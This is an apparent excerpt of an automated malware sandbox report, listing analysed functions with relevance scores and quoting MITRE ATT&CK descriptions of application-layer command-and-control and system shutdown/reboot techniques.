Function 00403899 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00401767 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 004051AF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 00403027 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Function 0040567E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre